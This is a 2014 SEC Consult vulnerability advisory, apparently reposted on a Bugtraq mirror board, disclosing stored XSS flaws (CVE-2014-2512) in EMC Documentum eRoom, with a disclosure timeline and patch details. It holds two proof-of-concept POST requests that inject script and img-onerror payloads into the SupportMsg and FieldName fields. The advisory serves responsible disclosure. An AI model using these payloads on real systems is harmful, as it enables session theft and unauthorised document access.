SEC Consult SA-20140701-0 :: Stored cross-site scripting vulnera

看板Bugtraq作者research.時間11年前 (2014/07/02 02:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20140701-0 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D title: Stored cross-site scripting vulnerabilities product: EMC Documentum eRoom vulnerable version: 7.4.3, 7.4.4, 7.4.4 SP1 fixed version: 7.4.3 ESA-2014-060 (hot fix) 7.4.4 P19 7.4.4 SP1 ESA-2014-060 (hot fix) CVE: CVE-2014-2512 impact: high homepage: http://www.emc.com/products/detail/software2/eroom.htm found: 2013-11-25 by: M. Heinzl SEC Consult Vulnerability Lab https://www.sec-consult.com/ =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Vendor description: - ------------------- "EMC Documentum eRoom is easy-to-use online team collaboration software tha= t enables distributed teams to work together more efficiently. With Documentu= m eRoom, teams around the world can accelerate document collaboration and gro= up activities, improve the development and delivery of products and services, optimize collaborative business processes, improve innovation, and streamli= ne decision-making." http://www.emc.com/products/detail/software2/eroom.htm Vulnerability overview/description: - ----------------------------------- Documentum eRoom suffers from multiple permanent cross-site scripting vulnerabilities, which allow an attacker to steal other user's sessions, to impersonate other users and to gain unauthorized access to documents hosted= in eRooms. A JavaScript worm could be utilized to crawl an eRoom and gather al= l available documents. There are many parameters which are not properly sanitized and thus are vulnerable to XSS. Proof of concept: - ----------------- 1) When creating a new database, the parameter used for the database fields ("SupportMsg") is not properly validated and is thus prone to permanent cross-site scripting. Request: POST /eRoomASP/eRoomSubmit.asp?FormName=3DsDlgGeneral&Ctxt=3DS_1&IsERPage=3DTRUE= &ERClickInMap=3DFALSE&command=3DbtnOK&SessionKey=3DZQCH5DHHZLLV6 HTTP/1.1 Host: localhost IEDummyField=3Dbugfix+29315&SubmitChecker=3Dset&HasRichText=3Dfalse&Session= Key=3DZQCH5DHHZLLV6&ERWindowName=3DeRw1342094805&EditSiteName=3DSEC&IEUsers= WorkOffline=3Don&AllowExtAppCommands=3Don&EnableWebDav=3Don&UseSecureCookie= s=3Don&ExpireSession=3D60&AlertAdminsObjectCount=3Don&PercentageObjectLimit= =3D80&MembersChoosePluginOption=3Don&EnableFileBlocking=3Don&BlockedFileExt= ensions=3Daccda%0D%0Aaccdb%0D%0Aaccde%0D%0Aasa%0D%0Aasp%0D%0Aaspx%0D%0Abat%= 0D%0Achm%0D%0Aclass%0D%0Acmd%0D%0Acom%0D%0Acpl%0D%0Acrt%0D%0Adll%0D%0Aexe%0= D%0Ahlp%0D%0Ahta%0D%0Ahtm%0D%0Ahtml%0D%0Ahtw%0D%0Ahtx%0D%0Ains%0D%0Aisp%0D%= 0Ajs%0D%0Ajse%0D%0Alnk%0D%0Amda%0D%0Amdb%0D%0Amde%0D%0Amdt%0D%0Amdw%0D%0Amd= z%0D%0Amht%0D%0Amhtml%0D%0Amsp%0D%0Aocx%0D%0Areg%0D%0Ascr%0D%0Asct%0D%0Ashb= %0D%0Ashs%0D%0Aurl%0D%0Avbe%0D%0Avbs%0D%0Awsc%0D%0Awsh&OverrideURL=3Dasd&Su= pportMsg=3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Othe= rInfoString=3Dasd&PaginationThreshold=3D500&LMLThreshold=3D500&HMLThreshold= =3D5000&RolodexTabs=3DA%3BB%3BC%3BD%3BE%3BF%3BG%3BH%3BI%3BJ%3BK%3BL%3B M%3BN%3BO%3BP%3BQ%3BR% 3BS%3BT%3BU%3BV%3BW%3BX%3BY%3BZ 2) The parameter "FieldName" is not properly validated and is thus prone to permanent cross-site scripting. A malicious payload will be executed when t= he asp script "ErrLoadingPage.asp" is called. Request: POST /eRoomASP/eRoomSubmit.asp?FormName=3DsDlgCreateDBField&Ctxt=3D.test.imgsrcx= onerroralert33.0_b97&ERClickInMap=3DFALSE&command=3DbtnNext&SessionKey=3DN3= 77T7XGBMJOO HTTP/1.1 Host: localhost IEDummyField=3Dbugfix+29315&SubmitChecker=3Dset&HasRichText=3Dfalse&Session= Key=3DN377T7XGBMJOO&ERWindowName=3DeRw1342086593&FieldName=3Dxxx%22%3E%3Cim= g+src%3Dx+onerror%3Dalert%28document.cookie%29+%2F%3E&FieldType=3D0 Vulnerable / tested versions: - ----------------------------- The vulnerabilities have been verified to exist in version 7.4.4 P11. Vendor contact timeline: - ------------------------ 2013-12-10: Contacting vendor through security_alert@emc.com 2013-12-10: Vendor will get back after investigation by December 19th. 2013-12-20: Vendor is still investigating vulnerabilities, will get back in January 2014-02-25: Vulnerabilities are confirmed, patch is issued for Q3 2014 2014-03-13: Notify vendor that the advisory will be published in accordance= to the responsible disclosure policy on 2014-04-20 2014-03-20: Vendor will publish patch end of June 2014 2014-03-31: Agreed to disclose advisory responsibly end of June 2014 2014-06-13: Vendor fixed issues, asking for credit line 2014-06-16: Providing credit line, asking for exact publication date 2014-06-16: Vendor announces patched version for 2014-06-30 2014-07-01: Publication of security advisory Solution: - --------- Upgrade or apply hot fixes: * 7.4.3 ESA-2014-060 (hot fix) * 7.4.4 P19 * 7.4.4 SP1 ESA-2014-060 (hot fix) Patches can be downloaded here: https://support.emc.com/downloads/5324_Documentum-eRoom Workaround: - ----------- None Advisory URL: - ------------- https://www.sec-consult.com/en/advisories.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF M. Heinzl / @2014 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJTspMiAAoJECyFJyAEdlkKd14H/1XRfbn4aYlVvMVyCKzg0vqp JDwu0ZCOZ1gWmCXxJVBB057M2olK9eZL6TM2ONHIwKVSR7bJ3oQOQfz9SUpZCMpQ V5lZqb4wY6jESj0Vqeq4/QNM1xA+6z83BeokuLg2nZyRJAnT5LLMXtaw5cM4OMcZ 54PO66I5YkuMyyMTQWicscEPwu1bIpW5w2IjtYC9ZCr7c8vFKYPRBfX6ZC/mFKYb T209peeLrV5dlz7e0q0AH2+llpEeeex06hH53KLG1koNJclDgBbnBA6YWMu74DgT KRY/n8ZSUs1etiE31jYBrCSpYk0xrfdALufs3pDHFm7m/hOSfvABx+VBRqxEHjw=3D =3DPx4D -----END PGP SIGNATURE-----

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 research. 的文章

文章代碼(AID): #1JilTVDQ (Bugtraq)